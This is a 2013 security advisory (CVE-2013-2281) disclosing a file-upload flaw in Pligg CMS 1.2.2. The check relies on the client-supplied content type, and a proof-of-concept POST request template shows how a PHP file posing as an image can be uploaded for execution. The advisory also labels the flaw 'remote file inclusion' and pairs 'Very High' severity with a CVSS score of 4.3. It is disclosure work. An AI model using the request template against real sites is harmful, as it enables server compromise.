Vulnerabilities Disclosure

Multiple Remote File Inclusions on Pligg CMS version 1.2.2

Dognædis Ref.: DGS-SEC-10

CVE Ref: CVE-2013-2281

Release Date: 2013/03/01

Discover Credits: CodeV - Code Analyzer

Bulletin Author(s): Rocha -CodeV Team


Type: Remote File Inclusion

Level: Very High (Low/High/Critical)

CVSS: 4.3 (Av:N/AC:M/Au:S/C:P/I:P/A:P)

Vulnerable Application: Pligg CMS (ver. 1.2.2)

Pligg was created as a social networking CMS. While most content management systems are designed for only a handful of authors, Pligg CMS was designed to manage a site with an unlimited number of authors. All of these registered users are in control of the website's content. It is a user driven CMS that relies on independent authors' content and participation to manage news articles.


File: app_root/editgroup.php?id=1 Vulnerable Argument(s): if(!in_array($_FILES['image_file']['type'],$allowedFileTypes))

line 68: $result = @move_uploaded_file($_FILES['image_file']['tmp_name'], $newimage);

Proof(s) of Concept:
POST <app_root>/editgroup.php?id=1 HTTP/1.1
Host: <host_location>
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: <app_root>/editgroup.php?id=1
Cookie: PHPSESSID=<session_id>; mnm_user=admin; mnm_key=<key>
Content-Type: multipart/form-data; boundary=---------------------------9709314337503198121012412638
Content-Length: <length_of_content>
Content-Disposition: form-data; name="token"

Content-Disposition: form-data; name="image_file"; filename=<file_to_upload>
Content-Type: image/jpeg
Content-Disposition: form-data; name="idname"

Content-Disposition: form-data; name="avatar"

Content-Disposition: form-data; name="avatarsource"

Content-Disposition: form-data; name="action"

Upload Image

This vulnerability allows an attacker to upload non expected content, for instance a php file, that will be executed while loading the file.

Generally, by exploiting this kind of vulnerability, it might be possible to achieve possible attack vectors to various kinds of attacks such as:
- Code execution on the web server
- Code execution on the client
- Denial of Service

Validation of uploaded files by the user should not be made through the headers of the POST request, but by the contents itself.

Official Solution:
At the moment, there is no official solution for the reported vulnerabilities.

External References:

Download the Vulnerability Report (PDF)

© Copyright 2015 CodeV